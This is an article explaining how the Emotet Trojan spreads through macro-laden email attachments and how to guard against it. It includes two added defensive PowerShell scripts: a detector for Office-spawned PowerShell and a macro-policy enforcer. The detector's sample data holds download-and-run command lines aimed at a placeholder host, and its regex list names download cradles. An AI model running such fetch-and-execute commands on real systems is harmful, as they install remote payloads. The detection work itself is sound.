How to protect yourself from Emotet, the virus designed to steal money

A ‘mutant’ Trojan that we receive as spam in our email

After five months of inactivity, the Emotet computer virus resumed its activity in July, and it has attacked 5% of companies worldwide to date. This malware infiltrates the system and steals information while trying to spread to other computers connected to the same network.

Emotet emerged in 2014 as malware delivered in a JavaScript file. Its objective was to steal confidential and private information, especially banking data, although over time it gained other capabilities such as sending spam and distributing other malware. It usually targets large companies (where the information to be stolen is valuable), and its main means of propagation is fraudulent email.

The emails with which an Emotet infection begins contain a link or a document, usually in .doc format. The text of the message typically warns that there is an unpaid invoice, or that a shipment will arrive soon, and urges the reader to consult the attached file for more information. For some time now, criminals have also used the coronavirus as a lure: the body of the email talks about how to avoid infection or what to do after contact with a positive case.

Enabling Office macros is opening the door to the virus

When the attached file is opened, it asks for permission to ‘Enable editing’. By accepting, the user disables Microsoft Office’s own safeguards against the execution of code through macros. In other cases, a link included in the email is the path criminals use to start the infection.

The virus infects the computer in one of two ways: it is installed directly, or it uses the Windows PowerShell console to download itself from the attackers’ command and control (C&C) servers. When the latter route is used, criminals can install additional malware such as ‘Qakbot’, a Trojan designed to steal banking details. This ability of Emotet to install multiple modules, each with its own function, makes it especially dangerous.
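The PowerShell download path described above is also what makes this stage detectable: an Office application should not normally be the parent of a PowerShell process, let alone one that hides its window and fetches content from the network. The following script is an added example, not code from the article or from any vendor it names. It runs detection logic over a constructed CSV of process-creation records (the fields a Sysmon Event ID 1 or Windows 4688 export would carry), decodes any `-EncodedCommand` argument so indicators hidden inside it become visible, and rates each Office-to-PowerShell launch. The sample events, the `placeholder.invalid` URLs and the indicator list are assumptions made for the example.

```powershell
# Added example (not from the article): detect an Office application launching PowerShell
# to download a payload. Input is a constructed CSV of process-creation records; nothing
# here touches a live system.

# Constructed sample. The encoded command is built from plaintext so the sample stays
# readable; the URL is a placeholder, not a real indicator.
$EncodedDownloader = [Convert]::ToBase64String(
    [Text.Encoding]::Unicode.GetBytes("IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/x')"))

$SampleEvents = @"
Time,ParentImage,Image,CommandLine
2020-07-20T09:01:10,C:\Windows\explorer.exe,C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE,"WINWORD.EXE /n C:\Users\u\Downloads\invoice.doc"
2020-07-20T09:01:15,C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE,C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,"powershell -w hidden -nop -enc $EncodedDownloader"
2020-07-20T09:05:00,C:\Windows\explorer.exe,C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,"powershell -File C:\Scripts\backup.ps1"
2020-07-20T09:07:42,C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE,C:\Windows\System32\cmd.exe,"cmd /c powershell -NoProfile -Command ""Invoke-WebRequest http://placeholder.invalid/y -OutFile C:\Users\u\AppData\Local\Temp\a.exe"""
"@

# Office applications that are the usual parents of a macro-launched process.
$OfficeProcesses = 'WINWORD.EXE', 'EXCEL.EXE', 'POWERPNT.EXE', 'OUTLOOK.EXE'

# Each entry pairs a human-readable reason with a regex tested against the (decoded) command line.
$Indicators = [ordered]@{
    'download cradle'   = 'DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|\biwr\b|Start-BitsTransfer'
    'encoded command'   = '\s-e(c|n|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}'
    'hidden window'     = '-w(indowstyle)?\s+hidden'
    'profile bypass'    = '-nop\b|-noprofile'
    'invoke-expression' = '\bIEX\b|Invoke-Expression'
}

function Expand-EncodedCommand {
    # Appends the decoded form of a -EncodedCommand argument (base64 of UTF-16LE text)
    # so that indicators inside it can be matched; leaves other command lines untouched.
    param([string]$CommandLine)
    $m = [regex]::Match($CommandLine, '(?i)\s-e(c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)')
    if (-not $m.Success) { return $CommandLine }
    try {
        $decoded = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($m.Groups[2].Value))
        return "$CommandLine  [decoded: $decoded]"
    } catch {
        return $CommandLine
    }
}

function Find-OfficeSpawnedPowerShell {
    # Returns one finding per event where an Office process is the parent of PowerShell
    # (directly, or via cmd.exe), with the indicators that matched.
    param([string]$Csv)
    foreach ($e in ($Csv | ConvertFrom-Csv)) {
        $parent = (Split-Path $e.ParentImage -Leaf).ToUpper()
        $child  = Split-Path $e.Image -Leaf
        $cmd    = Expand-EncodedCommand $e.CommandLine
        $runsPowerShell = ($child -ieq 'powershell.exe') -or ($cmd -match '\bpowershell(\.exe)?\b')
        if (-not $runsPowerShell -or ($OfficeProcesses -notcontains $parent)) { continue }

        $reasons = @("$parent spawned $child")
        foreach ($name in $Indicators.Keys) {
            if ($cmd -match $Indicators[$name]) { $reasons += $name }
        }
        $severity = if ($reasons.Count -gt 1) { 'high' } else { 'medium' }
        [pscustomobject]@{
            Time     = $e.Time
            Severity = $severity
            Reasons  = $reasons -join '; '
            Command  = $cmd
        }
    }
}

# Usage: on the constructed sample, events 2 and 4 are reported as 'high'; the backup
# script started from Explorer and the Word launch itself produce no finding.
Find-OfficeSpawnedPowerShell -Csv $SampleEvents | Format-List
```

The parent-child relationship alone is the strongest signal and is rated `medium` even when no command-line indicator matches, because a defender usually wants to see every Office-spawned shell; the indicator list only raises the severity. To run this over real data, replace `$SampleEvents` with an export that carries the same four columns.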

Emotet is also a Trojan, which opens the door to other viruses: an Emotet infection may be only the first of many. After infecting the computer, it joins it to a botnet and uses it to send spam emails to continue spreading.

The problem experts have found is that when Emotet sends itself to the contact list of an infected computer, the messages can carry real attachments, so the recipient is reassured: they receive something familiar from someone they already know.

How to protect yourself from Emotet

Caution is the best way to avoid infection. Never open the attachments or click on the link in an email received from a suspicious or unknown address. Security experts such as Panda Security or the Spanish National Cybersecurity Institute (Incibe) offer some additional tips for companies to avoid an Emotet infection:

■ Disable macro execution in Office by default: Do not enable a macro in an Office document unless you are completely sure of its legitimacy.

■ Keep computers up-to-date with the latest Windows patches: Emotet is one of the viruses that exploits the ‘EternalBlue’ vulnerability.

■ Recognize ‘phishing’ emails: Do not download any file of which you have the slightest suspicion or click on a link that you are not totally sure of.

■ Create strong passwords and use two-factor authentication on the sites and services that offer it: When Emotet infects a computer connected to a network, it tries to spread using a list of the most common passwords.

■ Install a cybersecurity solution that detects the infection and removes it, as cleaning your computer by hand is quite difficult.
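The first recommendation, disabling macro execution by default, can be enforced centrally rather than left to each user’s judgement at the ‘Enable editing’ prompt. The script below is an added example and not code from the article, Panda Security or Incibe. It audits, and with `-Enforce` sets, the Office macro policy values for Word, Excel and PowerPoint under the per-user policy hive; it assumes Office 2016/2019/365 (policy key version `16.0`), and the `VBAWarnings` value `4` (disable all macros without notification) together with `BlockContentExecutionFromInternet = 1` (block macros in files downloaded from the Internet) are the settings chosen for the example. In a domain these same values are normally delivered by Group Policy; the script is the stand-alone equivalent.

```powershell
# Added example (not from the article): audit and optionally enforce the Office macro policy.
# Assumes Office 2016/2019/365 (policy key "16.0") and runs as the user whose HKCU hive is
# affected. Run without parameters to audit only; add -Enforce to write the desired values.
param([switch]$Enforce)

$OfficeVersion = '16.0'
$Apps = 'Word', 'Excel', 'PowerPoint'
$DesiredSettings = [ordered]@{
    VBAWarnings                       = 4   # 4 = disable all macros without notification
    BlockContentExecutionFromInternet = 1   # 1 = block macros in files marked as from the Internet
}

function Get-MacroPolicyState {
    # One record per application and setting, with the current value (if any) and compliance.
    foreach ($app in $Apps) {
        $key = "HKCU:\Software\Policies\Microsoft\Office\$OfficeVersion\$app\Security"
        foreach ($name in $DesiredSettings.Keys) {
            $current = $null
            if (Test-Path $key) {
                $current = (Get-ItemProperty -Path $key -Name $name -ErrorAction SilentlyContinue).$name
            }
            [pscustomobject]@{
                Application = $app
                Setting     = $name
                Current     = $current
                Desired     = $DesiredSettings[$name]
                Compliant   = ($current -eq $DesiredSettings[$name])
            }
        }
    }
}

function Set-MacroPolicy {
    # Creates the policy keys if needed and writes every desired value as a DWORD.
    foreach ($app in $Apps) {
        $key = "HKCU:\Software\Policies\Microsoft\Office\$OfficeVersion\$app\Security"
        if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
        foreach ($name in $DesiredSettings.Keys) {
            New-ItemProperty -Path $key -Name $name -Value $DesiredSettings[$name] `
                -PropertyType DWord -Force | Out-Null
        }
    }
}

# Usage: audit first; enforce only when asked and only if something is non-compliant.
$state = Get-MacroPolicyState
$state | Format-Table -AutoSize
$nonCompliant = @($state | Where-Object { -not $_.Compliant })
if ($nonCompliant.Count -gt 0 -and $Enforce) {
    Set-MacroPolicy
    Write-Host "Policy applied; re-auditing:"
    Get-MacroPolicyState | Format-Table -AutoSize
} elseif ($nonCompliant.Count -gt 0) {
    Write-Host "$($nonCompliant.Count) setting(s) not compliant; re-run with -Enforce to apply."
}
```

Because the values live under `Software\Policies`, Office treats them as administrator policy and greys out the corresponding Trust Center options, so a user cannot simply re-enable macros from the ‘Enable editing’ bar. The audit output is also useful as a quick compliance check after a machine has been cleaned.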

Japan’s Computer Emergency Response Team (CERT) – the equivalent of the Spanish Incibe – has made a tool called EmoCheck available to any user on GitHub. To check whether your computer is infected, you just have to download the corresponding version and run it.
